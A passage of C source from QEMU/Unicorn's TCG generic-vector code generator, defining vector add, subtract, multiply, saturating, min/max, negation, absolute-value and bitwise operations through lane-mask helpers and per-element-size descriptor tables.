do_dup(tcg_ctx, MO_16, dofs, oprsz, maxsz, NULL, NULL, x); } void tcg_gen_gvec_dup8i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, uint8_t x) { check_size_align(oprsz, maxsz, dofs); do_dup(tcg_ctx, MO_8, dofs, oprsz, maxsz, NULL, NULL, x); } void tcg_gen_gvec_not(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen2 g = { .fni8 = tcg_gen_not_i64, .fniv = tcg_gen_not_vec, .fno = gen_helper_gvec_not, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; tcg_gen_gvec_2(tcg_ctx, dofs, aofs, oprsz, maxsz, &g); } /* Perform a vector addition using normal addition and a mask. The mask should be the sign bit of each lane. This 6-operation form is more efficient than separate additions when there are 4 or more lanes in the 64-bit operation. */ static void gen_addv_mask(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b, TCGv_i64 m) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andc_i64(tcg_ctx, t1, a, m); tcg_gen_andc_i64(tcg_ctx, t2, b, m); tcg_gen_xor_i64(tcg_ctx, t3, a, b); tcg_gen_add_i64(tcg_ctx, d, t1, t2); tcg_gen_and_i64(tcg_ctx, t3, t3, m); tcg_gen_xor_i64(tcg_ctx, d, d, t3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } void tcg_gen_vec_add8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 m = tcg_const_i64(tcg_ctx, dup_const(MO_8, 0x80)); gen_addv_mask(tcg_ctx, d, a, b, m); tcg_temp_free_i64(tcg_ctx, m); } void tcg_gen_vec_add16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 m = tcg_const_i64(tcg_ctx, dup_const(MO_16, 0x8000)); gen_addv_mask(tcg_ctx, d, a, b, m); tcg_temp_free_i64(tcg_ctx, m); } void tcg_gen_vec_add32_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t1, a, ~0xffffffffull); tcg_gen_add_i64(tcg_ctx, t2, a, b); tcg_gen_add_i64(tcg_ctx, t1, t1, b); tcg_gen_deposit_i64(tcg_ctx, d, t1, t2, 0, 32); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } static const TCGOpcode vecop_list_add[] = { INDEX_op_add_vec, 0 }; void tcg_gen_gvec_add(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g[4] = { { .fni8 = tcg_gen_vec_add8_i64, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_add8, .opt_opc = vecop_list_add, .vece = MO_8 }, { .fni8 = tcg_gen_vec_add16_i64, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_add16, .opt_opc = vecop_list_add, .vece = MO_16 }, { .fni4 = tcg_gen_add_i32, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_add32, .opt_opc = vecop_list_add, .vece = MO_32 }, { .fni8 = tcg_gen_add_i64, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_add64, .opt_opc = vecop_list_add, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_adds(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz) { static const GVecGen2s g[4] = { { .fni8 = tcg_gen_vec_add8_i64, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_adds8, .opt_opc = vecop_list_add, .vece = MO_8 }, { .fni8 = tcg_gen_vec_add16_i64, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_adds16, .opt_opc = vecop_list_add, .vece = MO_16 }, { .fni4 = tcg_gen_add_i32, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_adds32, .opt_opc = vecop_list_add, .vece = MO_32 }, { .fni8 = tcg_gen_add_i64, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_adds64, .opt_opc = vecop_list_add, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, c, &g[vece]); } void tcg_gen_gvec_addi(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_const_i64(tcg_ctx, c); tcg_gen_gvec_adds(tcg_ctx, vece, dofs, aofs, tmp, oprsz, maxsz); tcg_temp_free_i64(tcg_ctx, tmp); } static const TCGOpcode vecop_list_sub[] = { INDEX_op_sub_vec, 0 }; void tcg_gen_gvec_subs(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz) { static const GVecGen2s g[4] = { { .fni8 = tcg_gen_vec_sub8_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_subs8, .opt_opc = vecop_list_sub, .vece = MO_8 }, { .fni8 = tcg_gen_vec_sub16_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_subs16, .opt_opc = vecop_list_sub, .vece = MO_16 }, { .fni4 = tcg_gen_sub_i32, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_subs32, .opt_opc = vecop_list_sub, .vece = MO_32 }, { .fni8 = tcg_gen_sub_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_subs64, .opt_opc = vecop_list_sub, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, c, &g[vece]); } /* Perform a vector subtraction using normal subtraction and a mask. Compare gen_addv_mask above. */ static void gen_subv_mask(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b, TCGv_i64 m) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_or_i64(tcg_ctx, t1, a, m); tcg_gen_andc_i64(tcg_ctx, t2, b, m); tcg_gen_eqv_i64(tcg_ctx, t3, a, b); tcg_gen_sub_i64(tcg_ctx, d, t1, t2); tcg_gen_and_i64(tcg_ctx, t3, t3, m); tcg_gen_xor_i64(tcg_ctx, d, d, t3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } void tcg_gen_vec_sub8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 m = tcg_const_i64(tcg_ctx, dup_const(MO_8, 0x80)); gen_subv_mask(tcg_ctx, d, a, b, m); tcg_temp_free_i64(tcg_ctx, m); } void tcg_gen_vec_sub16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 m = tcg_const_i64(tcg_ctx, dup_const(MO_16, 0x8000)); gen_subv_mask(tcg_ctx, d, a, b, m); tcg_temp_free_i64(tcg_ctx, m); } void tcg_gen_vec_sub32_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t1, b, ~0xffffffffull); tcg_gen_sub_i64(tcg_ctx, t2, a, b); tcg_gen_sub_i64(tcg_ctx, t1, a, t1); tcg_gen_deposit_i64(tcg_ctx, d, t1, t2, 0, 32); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } void tcg_gen_gvec_sub(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g[4] = { { .fni8 = tcg_gen_vec_sub8_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_sub8, .opt_opc = vecop_list_sub, .vece = MO_8 }, { .fni8 = tcg_gen_vec_sub16_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_sub16, .opt_opc = vecop_list_sub, .vece = MO_16 }, { .fni4 = tcg_gen_sub_i32, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_sub32, .opt_opc = vecop_list_sub, .vece = MO_32 }, { .fni8 = tcg_gen_sub_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_sub64, .opt_opc = vecop_list_sub, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } static const TCGOpcode vecop_list_mul[] = { INDEX_op_mul_vec, 0 }; void tcg_gen_gvec_mul(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g[4] = { { .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_mul8, .opt_opc = vecop_list_mul, .vece = MO_8 }, { .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_mul16, .opt_opc = vecop_list_mul, .vece = MO_16 }, { .fni4 = tcg_gen_mul_i32, .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_mul32, .opt_opc = vecop_list_mul, .vece = MO_32 }, { .fni8 = tcg_gen_mul_i64, .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_mul64, .opt_opc = vecop_list_mul, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_muls(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz) { static const GVecGen2s g[4] = { { .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_muls8, .opt_opc = vecop_list_mul, .vece = MO_8 }, { .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_muls16, .opt_opc = vecop_list_mul, .vece = MO_16 }, { .fni4 = tcg_gen_mul_i32, .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_muls32, .opt_opc = vecop_list_mul, .vece = MO_32 }, { .fni8 = tcg_gen_mul_i64, .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_muls64, .opt_opc = vecop_list_mul, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, c, &g[vece]); } void tcg_gen_gvec_muli(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_const_i64(tcg_ctx, c); tcg_gen_gvec_muls(tcg_ctx, vece, dofs, aofs, tmp, oprsz, maxsz); tcg_temp_free_i64(tcg_ctx, tmp); } void tcg_gen_gvec_ssadd(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_ssadd_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_ssadd_vec, .fno = gen_helper_gvec_ssadd8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_ssadd_vec, .fno = gen_helper_gvec_ssadd16, .opt_opc = vecop_list, .vece = MO_16 }, { .fniv = tcg_gen_ssadd_vec, .fno = gen_helper_gvec_ssadd32, .opt_opc = vecop_list, .vece = MO_32 }, { .fniv = tcg_gen_ssadd_vec, .fno = gen_helper_gvec_ssadd64, .opt_opc = vecop_list, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_sssub(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_sssub_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_sssub_vec, .fno = gen_helper_gvec_sssub8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_sssub_vec, .fno = gen_helper_gvec_sssub16, .opt_opc = vecop_list, .vece = MO_16 }, { .fniv = tcg_gen_sssub_vec, .fno = gen_helper_gvec_sssub32, .opt_opc = vecop_list, .vece = MO_32 }, { .fniv = tcg_gen_sssub_vec, .fno = gen_helper_gvec_sssub64, .opt_opc = vecop_list, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } static void tcg_gen_usadd_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 max = tcg_const_i32(tcg_ctx, -1); tcg_gen_add_i32(tcg_ctx, d, a, b); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LTU, d, d, a, max, d); tcg_temp_free_i32(tcg_ctx, max); } static void tcg_gen_usadd_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 max = tcg_const_i64(tcg_ctx, -1); tcg_gen_add_i64(tcg_ctx, d, a, b); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, d, d, a, max, d); tcg_temp_free_i64(tcg_ctx, max); } void tcg_gen_gvec_usadd(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_usadd_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_usadd_vec, .fno = gen_helper_gvec_usadd8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_usadd_vec, .fno = gen_helper_gvec_usadd16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_usadd_i32, .fniv = tcg_gen_usadd_vec, .fno = gen_helper_gvec_usadd32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_usadd_i64, .fniv = tcg_gen_usadd_vec, .fno = gen_helper_gvec_usadd64, .opt_opc = vecop_list, .vece = MO_64 } }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } static void tcg_gen_ussub_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 min = tcg_const_i32(tcg_ctx, 0); tcg_gen_sub_i32(tcg_ctx, d, a, b); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LTU, d, a, b, min, d); tcg_temp_free_i32(tcg_ctx, min); } static void tcg_gen_ussub_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 min = tcg_const_i64(tcg_ctx, 0); tcg_gen_sub_i64(tcg_ctx, d, a, b); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, d, a, b, min, d); tcg_temp_free_i64(tcg_ctx, min); } void tcg_gen_gvec_ussub(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_ussub_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_ussub_vec, .fno = gen_helper_gvec_ussub8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_ussub_vec, .fno = gen_helper_gvec_ussub16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_ussub_i32, .fniv = tcg_gen_ussub_vec, .fno = gen_helper_gvec_ussub32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_ussub_i64, .fniv = tcg_gen_ussub_vec, .fno = gen_helper_gvec_ussub64, .opt_opc = vecop_list, .vece = MO_64 } }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_smin(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_smin_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_smin_vec, .fno = gen_helper_gvec_smin8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_smin_vec, .fno = gen_helper_gvec_smin16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_smin_i32, .fniv = tcg_gen_smin_vec, .fno = gen_helper_gvec_smin32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_smin_i64, .fniv = tcg_gen_smin_vec, .fno = gen_helper_gvec_smin64, .opt_opc = vecop_list, .vece = MO_64 } }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_umin(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_umin_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_umin_vec, .fno = gen_helper_gvec_umin8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_umin_vec, .fno = gen_helper_gvec_umin16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_umin_i32, .fniv = tcg_gen_umin_vec, .fno = gen_helper_gvec_umin32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_umin_i64, .fniv = tcg_gen_umin_vec, .fno = gen_helper_gvec_umin64, .opt_opc = vecop_list, .vece = MO_64 } }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_smax(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_smax_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_smax_vec, .fno = gen_helper_gvec_smax8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_smax_vec, .fno = gen_helper_gvec_smax16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_smax_i32, .fniv = tcg_gen_smax_vec, .fno = gen_helper_gvec_smax32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_smax_i64, .fniv = tcg_gen_smax_vec, .fno = gen_helper_gvec_smax64, .opt_opc = vecop_list, .vece = MO_64 } }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_umax(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_umax_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_umax_vec, .fno = gen_helper_gvec_umax8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_umax_vec, .fno = gen_helper_gvec_umax16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_umax_i32, .fniv = tcg_gen_umax_vec, .fno = gen_helper_gvec_umax32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_umax_i64, .fniv = tcg_gen_umax_vec, .fno = gen_helper_gvec_umax64, .opt_opc = vecop_list, .vece = MO_64 } }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } /* Perform a vector negation using normal negation and a mask. Compare gen_subv_mask above. */ static void gen_negv_mask(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b, TCGv_i64 m) { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andc_i64(tcg_ctx, t3, m, b); tcg_gen_andc_i64(tcg_ctx, t2, b, m); tcg_gen_sub_i64(tcg_ctx, d, m, t2); tcg_gen_xor_i64(tcg_ctx, d, d, t3); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } void tcg_gen_vec_neg8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b) { TCGv_i64 m = tcg_const_i64(tcg_ctx, dup_const(MO_8, 0x80)); gen_negv_mask(tcg_ctx, d, b, m); tcg_temp_free_i64(tcg_ctx, m); } void tcg_gen_vec_neg16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b) { TCGv_i64 m = tcg_const_i64(tcg_ctx, dup_const(MO_16, 0x8000)); gen_negv_mask(tcg_ctx, d, b, m); tcg_temp_free_i64(tcg_ctx, m); } void tcg_gen_vec_neg32_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t1, b, ~0xffffffffull); tcg_gen_neg_i64(tcg_ctx,t2, b); tcg_gen_neg_i64(tcg_ctx,t1, t1); tcg_gen_deposit_i64(tcg_ctx, d, t1, t2, 0, 32); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } void tcg_gen_gvec_neg(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_neg_vec, 0 }; static const GVecGen2 g[4] = { { .fni8 = tcg_gen_vec_neg8_i64, .fniv = tcg_gen_neg_vec, .fno = gen_helper_gvec_neg8, .opt_opc = vecop_list, .vece = MO_8 }, { .fni8 = tcg_gen_vec_neg16_i64, .fniv = tcg_gen_neg_vec, .fno = gen_helper_gvec_neg16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_neg_i32, .fniv = tcg_gen_neg_vec, .fno = gen_helper_gvec_neg32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_neg_i64, .fniv = tcg_gen_neg_vec, .fno = gen_helper_gvec_neg64, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_2(tcg_ctx, dofs, aofs, oprsz, maxsz, &g[vece]); } static void gen_absv_mask(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b, unsigned vece) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); int nbit = 8 << vece; /* Create -1 for each negative element. */ tcg_gen_shri_i64(tcg_ctx, t, b, nbit - 1); tcg_gen_andi_i64(tcg_ctx, t, t, dup_const(vece, 1)); tcg_gen_muli_i64(tcg_ctx, t, t, (1 << nbit) - 1); /* * Invert (via xor -1) and add one (via sub -1). * Because of the ordering the msb is cleared, * so we never have carry into the next element. */ tcg_gen_xor_i64(tcg_ctx, d, b, t); tcg_gen_sub_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } static void tcg_gen_vec_abs8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b) { gen_absv_mask(tcg_ctx, d, b, MO_8); } static void tcg_gen_vec_abs16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b) { gen_absv_mask(tcg_ctx, d, b, MO_16); } void tcg_gen_gvec_abs(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_abs_vec, 0 }; static const GVecGen2 g[4] = { { .fni8 = tcg_gen_vec_abs8_i64, .fniv = tcg_gen_abs_vec, .fno = gen_helper_gvec_abs8, .opt_opc = vecop_list, .vece = MO_8 }, { .fni8 = tcg_gen_vec_abs16_i64, .fniv = tcg_gen_abs_vec, .fno = gen_helper_gvec_abs16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_abs_i32, .fniv = tcg_gen_abs_vec, .fno = gen_helper_gvec_abs32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_abs_i64, .fniv = tcg_gen_abs_vec, .fno = gen_helper_gvec_abs64, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_2(tcg_ctx, dofs, aofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_and(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_and_i64, .fniv = tcg_gen_and_vec, .fno = gen_helper_gvec_and, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_mov(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_or(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_or_i64, .fniv = tcg_gen_or_vec, .fno = gen_helper_gvec_or, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_mov(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_xor(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_xor_i64, .fniv = tcg_gen_xor_vec, .fno = gen_helper_gvec_xor, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_dup8i(tcg_ctx, dofs, oprsz, maxsz, 0); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_andc(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_andc_i64, .fniv = tcg_gen_andc_vec, .fno = gen_helper_gvec_andc, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_dup8i(tcg_ctx, dofs, oprsz, maxsz, 0); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_orc(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_orc_i64, .fniv = tcg_gen_orc_vec, .fno = gen_helper_gvec_orc, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_dup8i(tcg_ctx, dofs, oprsz, maxsz, -1); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_nand(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_nand_i64, .fniv = tcg_gen_nand_vec, .fno = gen_helper_gvec_nand, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_not(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_nor(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, 